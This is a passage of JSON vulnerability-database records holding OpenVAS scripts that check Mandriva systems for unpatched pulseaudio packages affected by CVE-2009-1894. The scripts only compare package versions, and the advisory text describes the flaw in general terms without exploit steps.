largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:152\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64394\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:04", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64503", "href": "http://plugins.openvas.org/nasl.php?oid=64503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_171.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:171 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:171\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.\";\n\n \n\nif(description)\n{\n script_id(64503);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:20", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064503", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_171.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:171 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:171\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64503\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:10", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8649.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8649 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64704", "href": "http://plugins.openvas.org/nasl.php?oid=64704", "sourceData": "# 